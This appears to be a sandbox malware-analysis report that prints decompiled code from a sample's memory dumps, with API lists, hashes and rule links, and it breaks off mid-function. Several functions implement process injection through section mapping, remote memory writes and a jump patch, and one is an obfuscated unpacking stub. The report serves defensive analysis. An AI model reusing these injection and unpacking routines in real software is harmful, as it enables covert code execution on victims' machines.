Opcode ID: 2b104535f768232c2eb60f4591d1ea5aaf0333a9885dded86699bdb0ae67a6b5
Instruction ID: c21506e0fc88ba440ea6bcc6b6f55abd04b465cff164c1f0cab10b664a380183
Opcode Fuzzy Hash: 2b104535f768232c2eb60f4591d1ea5aaf0333a9885dded86699bdb0ae67a6b5
Instruction Fuzzy Hash: F13184716043519FF704FFA4EC899AA77A9FF94390B04496EF681C72A2DB389C05CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0008B7A8, Relevance: 6.1, APIs: 4, Instructions: 83
stringCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0008B7A8(WCHAR* __ecx, void* __edx) {
				signed int _v8;
				long _v12;
				char _v16;
				short _v528;
				char _v1040;
				char _v1552;
				intOrPtr _t23;
				char _t27;
				intOrPtr _t28;
				signed int _t29;
				void* _t33;
				long _t38;
				WCHAR* _t43;
				WCHAR* _t56;

				_t44 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t43 = __edx;
				_t56 = __ecx;
				memset(__edx, 0, 0x100);
				_v12 = 0x100;
				_t23 =  *0x9e684; // 0x28df8f0
				 *((intOrPtr*)(_t23 + 0xb0))( &_v528,  &_v12);
				lstrcpynW(_t43,  &_v528, 0x100);
				_t27 = E000895E1(_t44, 0xa88);
				_v16 = _t27;
				_t28 =  *0x9e684; // 0x28df8f0
				_t29 =  *((intOrPtr*)(_t28 + 0x68))(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t29;
				E000885D5( &_v16);
				_t33 = E0008C392(_t43);
				E00089640( &(_t43[E0008C392(_t43)]), 0x100 - _t33, L"%u", _v8);
				lstrcatW(_t43, _t56);
				_t38 = E0008C392(_t43);
				_v12 = _t38;
				CharUpperBuffW(_t43, _t38);
				return E0008D400(_t43, E0008C392(_t43) + _t40, 0);
			}

0x0008b7a8
0x0008b7b1
0x0008b7bd
0x0008b7c3
0x0008b7c5
0x0008b7cd
0x0008b7db
0x0008b7e0
0x0008b7ef
0x0008b7fa
0x0008b807
0x0008b81c
0x0008b821
0x0008b826
0x0008b828
0x0008b82f
0x0008b83f
0x0008b850
0x0008b85a
0x0008b862
0x0008b869
0x0008b86c
0x0008b889

APIs

memset.MSVCRT ref: 0008B7C5
lstrcpynW.KERNEL32(?,?,00000100), ref: 0008B7EF

Part of subcall function 00089640: _vsnwprintf.MSVCRT ref: 0008965D

lstrcatW.KERNEL32 ref: 0008B85A
CharUpperBuffW.USER32(?,00000000), ref: 0008B86C

Memory Dump Source

Source File: 0000000B.00000002.555668005.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: BuffCharUpper_vsnwprintflstrcatlstrcpynmemset
String ID:
API String ID: 1024327890-0
Opcode ID: bc563f98a76ff39ef6b2d004b5433a24202d3bbaf09a1f5485630d8fc5a90238
Instruction ID: 8115248732dee6e15747b0cfab76d271734f3ac179cb7c14a2a6e9e989f043a1
Opcode Fuzzy Hash: bc563f98a76ff39ef6b2d004b5433a24202d3bbaf09a1f5485630d8fc5a90238
Instruction Fuzzy Hash: F82156B2A00214BFE714BBA4DC4AFEE77BCFB85310F108566B505E6182EE755F088B60

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: regsvr32.exe PID: 1500 Parent PID: 672 regsvr32.exeCOMMON

Executed Functions

Function 1000C6C0, Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 200
nativeregistrymemoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E1000C6C0(void* __ecx, intOrPtr __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				long _v24;
				long _v28;
				void* _v32;
				intOrPtr _v36;
				long _v40;
				void* _v44;
				char _v56;
				char _v72;
				struct _WNDCLASSEXA _v120;
				void* _t69;
				intOrPtr _t75;
				struct HWND__* _t106;
				intOrPtr* _t113;
				struct _EXCEPTION_RECORD _t116;
				void* _t126;
				void* _t131;
				intOrPtr _t134;
				void* _t140;
				void* _t141;

				_t69 =  *0x1001e688; // 0x15d0590
				_t126 = __ecx;
				_t134 = __edx;
				_t116 = 0;
				_v36 = __edx;
				_v16 = 0;
				_v44 = 0;
				_v40 = 0;
				_v12 = 0;
				_v8 = 0;
				_v24 = 0;
				_v20 = __ecx;
				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
					E1000E23E(0x1f4);
					_t116 = 0;
				}
				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
				_v28 = _t116;
				if( *_t113 != 0x4550) {
					L12:
					if(_v8 != 0) {
						_t75 =  *0x1001e780; // 0x164fbc8
						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
						_v8 = _v8 & 0x00000000;
					}
					L14:
					if(_v12 != 0) {
						NtUnmapViewOfSection(GetCurrentProcess(), _v12);
					}
					if(_v16 != 0) {
						NtClose(_v16);
					}
					return _v8;
				}
				_v44 =  *((intOrPtr*)(_t113 + 0x50));
				if(NtCreateSection( &_v16, 0xe, _t116,  &_v44, 0x40, 0x8000000, _t116) < 0) {
					goto L12;
				}
				_v120.style = 0xb;
				_v120.cbSize = 0x30;
				_v120.lpszClassName =  &_v56;
				asm("movsd");
				_v120.lpfnWndProc = DefWindowProcA;
				asm("movsd");
				asm("movsd");
				asm("movsb");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				_v120.cbWndExtra = 0;
				_v120.lpszMenuName = 0;
				_v120.cbClsExtra = 0;
				_v120.hInstance = 0;
				if(RegisterClassExA( &_v120) != 0) {
					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0); // executed
					if(_t106 != 0) {
						DestroyWindow(_t106); // executed
						UnregisterClassA( &_v56, 0);
					}
				}
				if(NtMapViewOfSection(_v16, GetCurrentProcess(),  &_v12, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
					_t126 = _v20;
					goto L12;
				} else {
					_t126 = _v20;
					if(NtMapViewOfSection(_v16, _t126,  &_v8, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
						goto L12;
					}
					_t140 = E10008669( *0x1001e688, 0x1ac4);
					_v32 = _t140;
					if(_t140 == 0) {
						goto L12;
					}
					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
					_t131 = VirtualAllocEx(_t126, 0, 0x1ac4, 0x1000, 4);
					WriteProcessMemory(_v20, _t131, _t140, 0x1ac4,  &_v28);
					E1000861A( &_v32, 0x1ac4);
					_t141 =  *0x1001e688; // 0x15d0590
					 *0x1001e688 = _t131;
					E100086E1(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
					E1000C63F(_v12, _v8, _v36);
					 *0x1001e688 = _t141;
					goto L14;
				}
			}

APIs

NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,10005CEC), ref: 1000C733
RegisterClassExA.USER32 ref: 1000C785
CreateWindowExA.USER32 ref: 1000C7B0
DestroyWindow.USER32 ref: 1000C7BB
UnregisterClassA.USER32(?,00000000), ref: 1000C7C6
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000C7E2
NtMapViewOfSection.NTDLL(?,00000000), ref: 1000C7EC
NtMapViewOfSection.NTDLL(?,1000CBA0,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000C813
VirtualAllocEx.KERNEL32(1000CBA0,00000000,00001AC4,00001000,00000004), ref: 1000C856
WriteProcessMemory.KERNEL32(1000CBA0,00000000,00000000,00001AC4,?), ref: 1000C86F

Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660

GetCurrentProcess.KERNEL32(00000000), ref: 1000C8DB
NtUnmapViewOfSection.NTDLL(00000000), ref: 1000C8E2
NtClose.NTDLL(00000000), ref: 1000C8F5

Strings

sadccdcdsasa, xrefs: 1000C73E
0, xrefs: 1000C74D
cdcdwqwqwq, xrefs: 1000C76A

Memory Dump Source

Source File: 0000000D.00000002.561553251.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.561494090.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Section$ProcessView$ClassCreateCurrentWindow$AllocCloseDestroyFreeHeapMemoryRegisterUnmapUnregisterVirtualWrite
String ID: 0$cdcdwqwqwq$sadccdcdsasa
API String ID: 2002808388-2319545179
Opcode ID: 142da9db68d52c38d717a02c0839c2ca2f1210e5572982ee18d12491895b5d42
Instruction ID: 6d8830cee459303ec09d51d2f03be3a40535ffb0f4457941fb28a5827401908c
Opcode Fuzzy Hash: 142da9db68d52c38d717a02c0839c2ca2f1210e5572982ee18d12491895b5d42
Instruction Fuzzy Hash: 50711A71900259AFEB11CF95CC89EAEBBB9FF49740F118069F605B7290D770AE04CB64

Uniqueness

Uniqueness Score: -1.00%

Function 1000CB77, Relevance: 7.6, APIs: 5, Instructions: 105
nativeCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E1000CB77(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
				long _v8;
				long _v12;
				void* _v16;
				intOrPtr _v23;
				void _v24;
				long _v28;
				void* _v568;
				void _v744;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t32;
				intOrPtr _t33;
				intOrPtr _t35;
				void* _t39;
				intOrPtr _t43;
				void* _t63;
				long _t65;
				void* _t70;
				void** _t73;
				void* _t74;

				_t73 = __edx;
				_t63 = __ecx;
				_t74 = 0;
				if(E1000C4CE(__ecx, __edx, __edx, 0) != 0) {
					_t39 = E1000C6C0( *((intOrPtr*)(__edx)), _a4); // executed
					_t74 = _t39;
					if(_t74 != 0) {
						memset( &_v744, 0, 0x2cc);
						_v744 = 0x10002;
						_push( &_v744);
						_t43 =  *0x1001e684; // 0x164faa0
						_push(_t73[1]);
						if( *((intOrPtr*)(_t43 + 0xa8))() != 0) {
							_t70 = _v568;
							_v12 = _v12 & 0x00000000;
							_v24 = 0xe9;
							_t65 = 5;
							_v23 = _t74 - _t70 - _a4 + _t63 + 0xfffffffb;
							_v8 = _t65;
							_v16 = _t70;
							if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t73, _v568,  &_v24, _t65,  &_v8) < 0) {
								L6:
								_t74 = 0;
							} else {
								_v28 = _v28 & 0x00000000;
								if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, _v12,  &_v28) < 0) {
									goto L6;
								}
							}
						}
					}
				}
				_t32 =  *0x1001e77c; // 0x0
				if(_t32 != 0) {
					FreeLibrary(_t32);
					 *0x1001e77c =  *0x1001e77c & 0x00000000;
				}
				_t33 =  *0x1001e784; // 0x0
				if(_t33 != 0) {
					_t35 =  *0x1001e684; // 0x164faa0
					 *((intOrPtr*)(_t35 + 0x10c))(_t33);
					E1000861A(0x1001e784, 0xfffffffe);
				}
				return _t74;
			}

APIs

Part of subcall function 1000C4CE: LoadLibraryW.KERNEL32 ref: 1000C5C6
Part of subcall function 1000C4CE: memset.MSVCRT ref: 1000C605

FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 1000CC73

Part of subcall function 1000C6C0: NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,10005CEC), ref: 1000C733
Part of subcall function 1000C6C0: RegisterClassExA.USER32 ref: 1000C785
Part of subcall function 1000C6C0: CreateWindowExA.USER32 ref: 1000C7B0
Part of subcall function 1000C6C0: DestroyWindow.USER32 ref: 1000C7BB
Part of subcall function 1000C6C0: UnregisterClassA.USER32(?,00000000), ref: 1000C7C6

memset.MSVCRT ref: 1000CBB8
NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 1000CC22
NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 1000CC3F
NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 1000CC60

Memory Dump Source

Source File: 0000000D.00000002.561553251.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.561494090.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: MemoryVirtual$ClassCreateLibraryProtectWindowmemset$DestroyFreeLoadRegisterSectionUnregisterWrite
String ID:
API String ID: 317994034-0
Opcode ID: e9ba61dee699041d89b454d2aaebe348e1d06309881bf86e54450125777bed9c
Instruction ID: ec983c159b6771507b2e65583ae913044cb7e5fe8140f97fdbe63d1be5c924e3
Opcode Fuzzy Hash: e9ba61dee699041d89b454d2aaebe348e1d06309881bf86e54450125777bed9c
Instruction Fuzzy Hash: 1E310C76A00219AFFB01DFA5CD89F9EB7B8EF08790F114165F504D61A4D771EE448B90

Uniqueness

Uniqueness Score: -1.00%

Function 00492C41, Relevance: 5.1, APIs: 3, Instructions: 582COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.559938284.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55a69c6a80807367d2ee6713c95060d97be892416f160e53a89ffe9f7bcefe76
Instruction ID: 7713808056b20f61990294cd3538e732475c9ce662e1aed4630968c295ef396e
Opcode Fuzzy Hash: 55a69c6a80807367d2ee6713c95060d97be892416f160e53a89ffe9f7bcefe76
Instruction Fuzzy Hash: 08427B32C00609DFEF04CFA0C9897AA7BB5FF64315F1850AADD0DAE149C77815A4CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00493073, Relevance: 4.8, APIs: 3, Instructions: 306comlibraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00492C25,00492C25,458F0000,?,00000000), ref: 004931F1
OleUninitialize.OLE32(00492C25), ref: 00493354

Memory Dump Source

Source File: 0000000D.00000002.559938284.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: true

Similarity

API ID: LibraryLoadUninitialize
String ID:
API String ID: 2978721001-0
Opcode ID: 63462bf202cfa106886da0fd231bacab201c4396b8d2cbd2302e506409071efd
Instruction ID: d46fadbdf66abe91b89b1cb55d359b6249b23a44cfc55b277f7645e9818216c8
Opcode Fuzzy Hash: 63462bf202cfa106886da0fd231bacab201c4396b8d2cbd2302e506409071efd
Instruction Fuzzy Hash: E5D16A72C00615DFEF04CFA0C9897AABBB5FF54315F08546ADD09AF149C73816A4CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00491424, Relevance: 3.3, APIs: 2, Instructions: 272
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 50%

			E00491424(signed int __ebx, void* __ecx, signed int __edx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t154;
				int _t155;
				signed int _t158;
				int _t159;
				signed int _t160;
				intOrPtr _t163;
				signed int _t164;
				signed int _t166;
				signed int _t169;
				signed int _t171;
				intOrPtr _t175;
				signed int _t176;
				intOrPtr _t177;
				signed int _t179;
				signed int _t182;
				signed int _t183;
				signed int _t185;
				signed int _t188;
				signed int _t189;
				signed int _t190;
				void* _t192;
				signed int _t193;
				signed int _t194;
				signed int _t212;
				signed int _t215;
				signed int _t224;
				signed int _t225;
				void* _t226;
				void* _t227;
				signed int _t234;
				signed int _t237;
				void* _t244;
				signed int* _t246;

				_t234 = __esi;
				_t224 = __edi;
				_t212 = __edx;
				_t155 = E0049463B(_t154, __ebx, __ecx, __edi);
				_push(__ecx);
				_t188 = __ebx | __ebx;
				_t185 = _t188;
				_pop(_t189);
				if(_t188 != 0) {
					if( *(_t185 + 0x4358a4) == 0) {
						_t183 =  *((intOrPtr*)(_t185 + 0x4410a0))(0, 1,  *((intOrPtr*)(_t185 + 0x435888)), 0xf,  *((intOrPtr*)(_t185 + 0x4353a6)), 0x1c4, 0x800);
						 *_t246 = _t189;
						 *(_t185 + 0x4358a4) = 0 ^ _t183;
						_t189 = 0;
					}
					_push(4);
					_push(0x1000);
					_push( *((intOrPtr*)(_t185 + 0x435280)));
					_push(0);
					if( *(_t185 + 0x435585) == 0) {
						_t182 =  *((intOrPtr*)(_t185 + 0x441064))(_t185 + 0x43546a);
						 *(_t244 - 8) = _t212;
						 *(_t185 + 0x435585) =  *(_t185 + 0x435585) & 0x00000000;
						 *(_t185 + 0x435585) =  *(_t185 + 0x435585) ^ (_t212 & 0x00000000 | _t182);
						_t212 =  *(_t244 - 8);
					}
					_t155 = VirtualAlloc();
				}
				 *_t17 = _t155;
				 *((intOrPtr*)(_t185 + 0x4354d2)) = 2;
				if( *(_t185 + 0x435014) == 0) {
					_t179 =  *((intOrPtr*)(_t185 + 0x441054))(_t185 + 0x435702, _t155);
					 *(_t244 - 4) = _t224;
					 *(_t185 + 0x435014) = 0 ^ _t179;
					_t224 =  *(_t244 - 4);
					_t155 = (_t179 & 0x00000000) +  *_t246;
					_t246 =  &(_t246[1]);
				}
				 *(_t185 + 0x4350dc) =  *(_t185 + 0x4350dc) & 0x00000000;
				 *(_t185 + 0x4350dc) =  *(_t185 + 0x4350dc) ^ _t234 & 0x00000000 ^ _t155;
				_t237 = _t234;
				if( *(_t185 + 0x4350b0) > 0) {
					if( *((intOrPtr*)(_t185 + 0x43590c)) == 0) {
						_t177 =  *((intOrPtr*)(_t185 + 0x4410a0))(0, 1,  *((intOrPtr*)(_t185 + 0x4351af)),  *((intOrPtr*)(_t185 + 0x435422)), 0x1d7, 0xf8,  *((intOrPtr*)(_t185 + 0x43539e)));
						 *(_t244 - 8) = _t237;
						 *((intOrPtr*)(_t185 + 0x43590c)) = _t177;
						_t237 =  *(_t244 - 8);
					}
					_push(_t185 + 0x4354d2);
					_push(0x40);
					if( *(_t185 + 0x435968) == 0) {
						_t176 =  *((intOrPtr*)(_t185 + 0x441058))();
						 *(_t185 + 0x435968) =  *(_t185 + 0x435968) & 0x00000000;
						 *(_t185 + 0x435968) =  *(_t185 + 0x435968) | _t189 -  *_t246 | _t176;
						_t189 = _t189;
					}
					_t175 =  *((intOrPtr*)(_t185 + 0x441044))(_t185 + 0x43501c, _t185 + 0x4354ea,  *(_t185 + 0x435462));
					 *_t246 = _t189;
					 *((intOrPtr*)(_t185 + 0x4359f1)) = _t175;
					_t189 = 0;
					_t155 = VirtualProtect( *(_t185 + 0x4350b0), ??, ??, ??);
				}
				if(_t155 != _t185) {
					if( *(_t185 + 0x435366) == 0) {
						_t171 =  *((intOrPtr*)(_t185 + 0x441068))(_t185 + 0x4357ae);
						 *(_t185 + 0x435366) =  *(_t185 + 0x435366) & 0x00000000;
						 *(_t185 + 0x435366) =  *(_t185 + 0x435366) ^ _t224 & 0x00000000 ^ _t171;
						_t224 = _t224;
					}
					_push( *((intOrPtr*)(_t185 + 0x43574e)));
					_push( *((intOrPtr*)(_t185 + 0x435288)));
					if( *(_t185 + 0x435248) == 0) {
						_t169 =  *((intOrPtr*)(_t185 + 0x441064))(_t185 + 0x4358c8);
						 *(_t244 - 8) = _t212;
						 *(_t185 + 0x435248) =  *(_t185 + 0x435248) & 0x00000000;
						 *(_t185 + 0x435248) =  *(_t185 + 0x435248) ^ (_t212 ^  *(_t244 - 8) | _t169);
						_t212 =  *(_t244 - 8);
					}
					_t155 = E00493726(_t185, _t189, _t212, _t224, _t237); // executed
				}
				 *(_t244 - 4) = _t212;
				_t190 = 0 ^  *(_t185 + 0x435462);
				_t215 =  *(_t244 - 4);
				 *(_t244 - 8) = _t155;
				_t225 = 0 ^  *(_t185 + 0x4350b0);
				_t158 =  *(_t244 - 8);
				if( *((intOrPtr*)(_t185 + 0x4357a2)) == 0) {
					_t158 =  *((intOrPtr*)(_t185 + 0x441060))();
					 *_t79 = _t158;
					_push( *(_t244 - 8));
					_pop( *_t81);
					 *_t82 = _t190;
					_t190 = (_t190 & 0x00000000) +  *(_t244 - 4);
				}
				_t192 = _t225 | _t225;
				_t226 = _t192;
				_t193 = _t190;
				if(_t192 != 0) {
					if( *(_t185 + 0x435520) == 0) {
						_t158 =  *((intOrPtr*)(_t185 + 0x4410a0))( *((intOrPtr*)(_t185 + 0x435681)),  *((intOrPtr*)(_t185 + 0x4353d2)),  *((intOrPtr*)(_t185 + 0x4354ba)),  *((intOrPtr*)(_t185 + 0x435796)),  *((intOrPtr*)(_t185 + 0x4354a2)), 0xdf, 0x400, _t193);
						 *(_t244 - 8) = _t193;
						 *(_t185 + 0x435520) =  *(_t185 + 0x435520) & 0x00000000;
						 *(_t185 + 0x435520) =  *(_t185 + 0x435520) | _t193 & 0x00000000 ^ _t158;
						_t193 =  *_t246;
						_t246 =  &(_t246[1]);
					}
					_push(_t226);
					if( *(_t185 + 0x4353c6) == 0) {
						_t158 =  *((intOrPtr*)(_t185 + 0x44105c))(_t193);
						 *(_t185 + 0x4353c6) =  *(_t185 + 0x4353c6) & 0x00000000;
						 *(_t185 + 0x4353c6) =  *(_t185 + 0x4353c6) ^ _t237 & 0x00000000 ^ _t158;
						_t237 = _t237;
						_t193 = (_t193 & 0x00000000) +  *_t246;
						_t246 = _t246 - 0xfffffffc;
					}
					_t158 = E00494495(_t158, _t185, _t193, _t215, _t226, _t237);
				}
				 *_t246 =  *_t246 ^ _t158;
				_t159 = _t158;
				if( *(_t185 + 0x435855) == 0) {
					_t166 =  *((intOrPtr*)(_t185 + 0x4410a4))( *((intOrPtr*)(_t185 + 0x435615)), _t159);
					 *(_t244 - 8) = _t226;
					 *(_t185 + 0x435855) =  *(_t185 + 0x435855) & 0x00000000;
					 *(_t185 + 0x435855) =  *(_t185 + 0x435855) ^ (_t226 -  *(_t244 - 8) | _t166);
					_t226 =  *(_t244 - 8);
					_pop( *_t113);
					_t193 =  *(_t244 - 8);
					 *_t115 = _t193;
					_t159 = _t166 & 0x00000000 ^  *(_t244 - 4);
				}
				_t160 = memset(_t226, _t159, _t193 << 0);
				_t227 = _t226 + _t193;
				_t194 = 0;
				if( *(_t185 + 0x4353ce) == 0) {
					_t160 =  *((intOrPtr*)(_t185 + 0x441068))(_t185 + 0x4359ac);
					 *(_t244 - 4) = _t215;
					 *(_t185 + 0x4353ce) =  *(_t185 + 0x4353ce) & 0x00000000;
					 *(_t185 + 0x4353ce) =  *(_t185 + 0x4353ce) | _t215 -  *(_t244 - 4) | _t160;
					_t215 =  *(_t244 - 4);
				}
				if( *((intOrPtr*)(_t185 + 0x43574e)) != _t185) {
					if( *(_t185 + 0x4357d6) == 0) {
						_t164 =  *((intOrPtr*)(_t185 + 0x441058))();
						 *(_t244 - 8) = _t237;
						 *(_t185 + 0x4357d6) = 0 ^ _t164;
						_t237 =  *(_t244 - 8);
					}
					_push( *((intOrPtr*)(_t185 + 0x43574e)));
					if( *((intOrPtr*)(_t185 + 0x435177)) == 0) {
						_t163 =  *((intOrPtr*)(_t185 + 0x441064))(_t185 + 0x4351ff);
						 *(_t244 - 8) = _t194;
						 *((intOrPtr*)(_t185 + 0x435177)) = _t163;
						_t194 =  *(_t244 - 8);
					}
					_t161 = E0049242A(_t185, _t194, _t215, _t227, _t237); // executed
					if( *((intOrPtr*)(_t185 + 0x43536a)) == 0) {
						 *_t144 =  *((intOrPtr*)(_t185 + 0x4410a8))(0,  *((intOrPtr*)(_t185 + 0x43549e)));
						 *_t146 =  *(_t244 - 4);
					}
					_t160 = E00493658(_t161, _t185, _t215, _t227, _t237,  *((intOrPtr*)(_t185 + 0x43574e)));
				}
				 *(_t244 - 8) = _t194;
				 *_t151 = _t215 & 0x00000000 ^ (_t194 & 0x00000000 |  *(_t185 + 0x4351a7));
				 *_t153 =  *(_t244 - 4);
				asm("popad");
				return _t160;
			}

0x00491424
0x00491424
0x00491424
0x00491424
0x00491429
0x0049142c
0x0049142e
0x00491430
0x00491431
0x0049143a
0x00491458
0x00491460
0x00491467
0x0049146d
0x0049146d
0x0049146e
0x00491470
0x00491475
0x0049147b
0x00491484
0x0049148d
0x00491493
0x0049149b
0x004914a2
0x004914a8
0x004914a8
0x004914ab
0x004914ab
0x004914b2
0x004914b8
0x004914c9
0x004914d3
0x004914d9
0x004914e0
0x004914e6
0x004914ef
0x004914f2
0x004914f2
0x004914fb
0x00491502
0x00491508
0x00491510
0x0049151d
0x0049153f
0x00491545
0x0049154c
0x00491552
0x00491552
0x0049155b
0x0049155c
0x00491565
0x00491567
0x00491573
0x0049157a
0x00491580
0x00491580
0x00491595
0x0049159d
0x004915a4
0x004915aa
0x004915b1
0x004915b1
0x004915b9
0x004915c2
0x004915cb
0x004915d7
0x004915de
0x004915e4
0x004915e4
0x004915e5
0x004915eb
0x004915f8
0x00491601
0x00491607
0x0049160f
0x00491616
0x0049161c
0x0049161c
0x0049161f
0x0049161f
0x00491624
0x0049162f
0x00491631
0x00491634
0x0049163f
0x00491641
0x0049164b
0x0049164e
0x00491655
0x00491658
0x0049165b
0x00491667
0x0049166a
0x0049166a
0x00491670
0x00491672
0x00491674
0x00491675
0x00491682
0x004916ad
0x004916b3
0x004916bb
0x004916c2
0x004916cd
0x004916d0
0x004916d0
0x004916d3
0x004916db
0x004916de
0x004916ea
0x004916f1
0x004916f7
0x004916fe
0x00491701
0x00491701
0x00491704
0x00491704
0x0049170a
0x0049170d
0x00491715
0x0049171f
0x00491725
0x0049172d
0x00491734
0x0049173a
0x0049173d
0x00491740
0x00491749
0x0049174c
0x0049174c
0x0049174f
0x0049174f
0x0049174f
0x00491758
0x00491761
0x00491767
0x0049176f
0x00491776
0x0049177c
0x0049177c
0x00491785
0x0049178e
0x00491790
0x00491796
0x0049179d
0x004917a3
0x004917a3
0x004917a6
0x004917b3
0x004917bc
0x004917c2
0x004917c9
0x004917cf
0x004917cf
0x004917d2
0x004917de
0x004917ef
0x004917f5
0x004917f5
0x00491801
0x00491801
0x00491806
0x0049181b
0x00491821
0x00491824
0x00491826

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 004914AB
VirtualProtect.KERNEL32(?), ref: 004915B1

Memory Dump Source

Source File: 0000000D.00000002.559938284.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: true

Similarity

API ID: Virtual$AllocProtect
String ID:
API String ID: 2447062925-0
Opcode ID: 22e667abeca61440a8b0fec79a75a9c4ed0bf930217f70a32a92829f77582f46
Instruction ID: 1a836e30e6cf1ab7873d019f66a5ce716cfe4d67b637c9fcf91c89bd9c379917
Opcode Fuzzy Hash: 22e667abeca61440a8b0fec79a75a9c4ed0bf930217f70a32a92829f77582f46
Instruction Fuzzy Hash: 1FC14172904604EFFF14CFA0C989B5A7BB1FF64311F1860AAED0D9E19AD77415A4CB28

Uniqueness

Uniqueness Score: -1.00%

Function 004932EB, Relevance: 3.2, APIs: 2, Instructions: 151comCOMMON

Download Yara Rule

APIs

OleUninitialize.OLE32(00492C25), ref: 00493354
OleInitialize.OLE32(00000000,00000000), ref: 0049349A

Memory Dump Source

Source File: 0000000D.00000002.559938284.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: true

Similarity

API ID: InitializeUninitialize
String ID:
API String ID: 3442037557-0
Opcode ID: b3e2ec72f7409a1985b0da953e772d2d78d9d955f9ccdd8e3959b9227137adb3
Instruction ID: 18c467592b045fc778b3cc886ac870a2886a31d724dc805689771eadf7a7d25e
Opcode Fuzzy Hash: b3e2ec72f7409a1985b0da953e772d2d78d9d955f9ccdd8e3959b9227137adb3
Instruction Fuzzy Hash: 79518B72D04619DFEF14CFA4C8897AABBB1FF14311F09516ADD49AA189C7380590CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00493726, Relevance: 2.2, APIs: 1, Instructions: 735
comCOMMONCrypto

Download Yara Rule

C-Code - Quality: 78%

			E00493726(void* __ebx, signed int __ecx, void* __edx, signed int __edi, void* __esi, intOrPtr _a4, signed int _a8) {
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t416;
				signed int _t417;
				signed int _t421;
				void* _t425;
				signed int _t427;
				signed int _t429;
				signed int _t434;
				signed int _t436;
				signed int _t438;
				signed int _t440;
				signed int _t441;
				signed int _t443;
				signed int _t446;
				signed int _t450;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t457;
				signed int _t459;
				signed int _t461;
				signed int _t462;
				signed int _t465;
				signed int _t466;
				signed int _t468;
				signed int _t469;
				signed int _t471;
				signed int _t473;
				signed int _t476;
				signed int _t477;
				signed int _t478;
				signed int _t480;
				signed int _t481;
				signed int _t486;
				signed int _t489;
				void* _t493;
				void* _t495;
				signed int _t497;
				signed int _t500;
				void* _t503;
				signed int _t504;
				signed int _t507;
				signed int _t509;
				signed int _t512;
				signed int _t514;
				signed int _t515;
				signed int _t520;
				signed int _t525;
				int _t527;
				int _t531;
				void* _t567;
				signed int _t568;
				signed int _t570;
				signed int _t584;
				signed int _t585;
				signed int _t587;
				void* _t590;
				void* _t592;
				void* _t625;
				intOrPtr* _t626;
				signed int _t627;
				void* _t629;
				signed int _t634;
				signed int _t637;
				signed int _t639;
				void* _t640;
				void* _t641;
				signed int _t657;
				signed int _t660;
				signed int* _t672;
				signed int* _t673;
				signed int* _t676;
				intOrPtr* _t677;
				signed int* _t678;

				_t625 = __esi;
				_t584 = __edi;
				_t567 = __edx;
				_t504 = __ecx;
				_t493 = __ebx;
				if( *((intOrPtr*)(__ebx + 0x435126)) == 0) {
					_push(__ebx + 0x4354be);
					 *_t4 =  *((intOrPtr*)(__ebx + 0x44106c))();
					_push(_v20);
					_pop( *_t6);
				}
				_t416 = _t493 + 0x435323;
				if( *(_t493 + 0x4351eb) == 0) {
					_t489 =  *((intOrPtr*)(_t493 + 0x441064))(_t493 + 0x43521f, _t416);
					 *_t672 = _t657;
					 *(_t493 + 0x4351eb) = 0 ^ _t489;
					_t657 = 0;
